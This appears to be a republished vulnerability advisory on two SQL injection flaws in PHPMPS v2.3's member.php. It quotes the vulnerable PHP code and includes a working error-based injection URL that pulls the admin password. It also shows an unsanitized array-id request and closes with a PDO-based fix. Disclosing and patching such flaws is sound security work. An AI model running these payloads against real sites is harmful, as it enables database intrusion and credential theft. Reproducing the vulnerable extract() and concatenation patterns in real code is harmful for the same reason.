phpmps_v2.3 (latest version): two SQL injection vulnerabilities - vulnerability warning - the black bar safety net

2013-11-19T00:00:00
ID MYHACK58:62201341242
Type myhack58
Reporter My5t3ry@乌云
Modified 2013-11-19T00:00:00

Description

Brief description:

PHPMPS does not properly handle user-submitted parameters, leading to multiple SQL injection vulnerabilities.

Detailed description:

member.php 422-455

============================================================================================

case 'exchange':
    $units = array('gold'=>'medals', 'money'=>'$', 'credit'=>'sub');
    $types = array('money'=>'money', 'gold'=>'information currency', 'credit'=>'points');
    $notes = array('login'=>'login points', 'post_info_credit'=>'publish information points', 'post_comment_credit'=>'comment points', 'info_refer'=>'one-key information refresh', 'info_top'=>'info sticky', 'credit2gold'=>'points redeemed for information currency', 'money2gold'=>'funds used to buy information currency');

    // Every GET/POST/COOKIE key becomes a local variable here, so $table (and $sql, $page, ...) can be supplied by the client.
    extract($_REQUEST);

    $page = isset($page) ? intval($page) : 1;
    $pagesize = 20;

    $sql = '';
    // $type, $begindate and $enddate come straight from the request; $type is concatenated without escaping.
    if($type) $sql .= "AND type='$type' ";
    if($begindate) {
        $begintime = strtotime($begindate.' 00:00:00');
        $sql .= "AND addtime>=$begintime ";
    }
    if($enddate) {
        $endtime = strtotime($enddate.' 23:59:59');
        $sql .= "AND addtime<=$endtime";
    }

    // {$table} is the table prefix; once overwritten via extract() it is placed verbatim into the FROM clause.
    $r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql");

    $pager['search'] = array('act' => 'exchange');
    $pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize);

    $exchanges = array();
    $result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]");
    while($r = $db->rows($result)) {
        $r['unit'] = $units[$r['type']];
        $r['type'] = $types[$r['type']];
        $r['note'] = !empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note'];
        $r['addtime'] = date('Y-m-d h:i:s', $r['addtime']);
        $exchanges[] = $r;
    }

    $seo['title'] = 'transaction details';
    include template('member_exchange');
    break;

============================================================================================

The code above calls extract($_REQUEST), which lets a client overwrite any local variable. Overwriting $table places attacker-controlled text directly into the FROM clause, so an injection can be constructed.

Example request:

http://192.168.116.128/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%201=1%20and%20%28SELECT%201%20from%20%28select%20count%28%29,concat%28floor%28rand%280%292%29,%28substring%28%28select%28select%20password%20from%20phpmps_admin%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23

SQL injection vulnerability 2:

============================================================================================

member.php 741-746

============================================================================================

case 'delete':
    // Only the scalar branch is cast with intval(); array elements are joined as-is.
    $id = is_array($_REQUEST['id']) ? join(',', $_REQUEST['id']) : intval($_REQUEST['id']);
    if(empty($id)) showmsg('not selected record');
    $db->query("DELETE FROM {$table}comment WHERE id IN ($id)");
    showmsg('deleted successfully', 'member.php?act=info_comment');
    break;

============================================================================================

The array case of $id is not sanitized here: only the scalar branch goes through intval(), so submitting id as an array injects its elements unchanged into the IN (...) list.

For example: http://192.168.116.128/phpmps/member.php?act=delete&id[]=1a

Proof of vulnerability:

Fix:

Filtering and...
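As an added illustration of the fix (example code written for this page, not the PHPMPS project's own patch), the two handlers rewritten so that neither request-controlled value reaches the SQL text: extract() is dropped in favour of explicit parameter reads with a whitelist for $type, the id list is reduced to positive integers, and values are bound through PDO placeholders. $pdo and the $table prefix are assumed to come from the application's own configuration.

```php
<?php
// Added example, not PHPMPS code. Assumes a PDO connection $pdo and a
// config-supplied table prefix $table (never taken from the request).

// Vulnerability 2: accept a scalar or an array of ids, keep only positive
// integers. A value such as "1a" is rejected rather than joined into the query.
function sanitize_ids($raw): array {
    $ids = is_array($raw) ? $raw : [$raw];
    $clean = [];
    foreach ($ids as $v) {
        if (is_int($v) || (is_string($v) && ctype_digit($v))) {
            $n = (int) $v;
            if ($n > 0) { $clean[] = $n; }
        }
    }
    return array_values(array_unique($clean));
}

function delete_comments(PDO $pdo, string $table, $raw_ids): int {
    $ids = sanitize_ids($raw_ids);
    if (!$ids) { return 0; }                       // nothing valid was selected
    $marks = implode(',', array_fill(0, count($ids), '?'));
    // Table prefix is trusted config; every id is a bound parameter.
    $stmt = $pdo->prepare("DELETE FROM {$table}comment WHERE id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->rowCount();
}

// Vulnerability 1: no extract(); read each filter explicitly, whitelist $type,
// and return SQL with placeholders plus the bound values.
function exchange_filter(array $request): array {
    $allowedTypes = ['money', 'gold', 'credit'];
    $sql = '';
    $params = [];
    if (isset($request['type']) && in_array($request['type'], $allowedTypes, true)) {
        $sql .= 'AND type = ? ';
        $params[] = $request['type'];
    }
    $begin = !empty($request['begindate']) ? strtotime($request['begindate'] . ' 00:00:00') : false;
    if ($begin !== false) {
        $sql .= 'AND addtime >= ? ';
        $params[] = $begin;
    }
    $end = !empty($request['enddate']) ? strtotime($request['enddate'] . ' 23:59:59') : false;
    if ($end !== false) {
        $sql .= 'AND addtime <= ? ';
        $params[] = $end;
    }
    return [$sql, $params];
}
```

The caller then runs "SELECT ... FROM {$table}pay_exchange WHERE username = ? $sql" with $_username prepended to $params, so the prefix is fixed at configuration time and the filters can no longer alter the statement's structure.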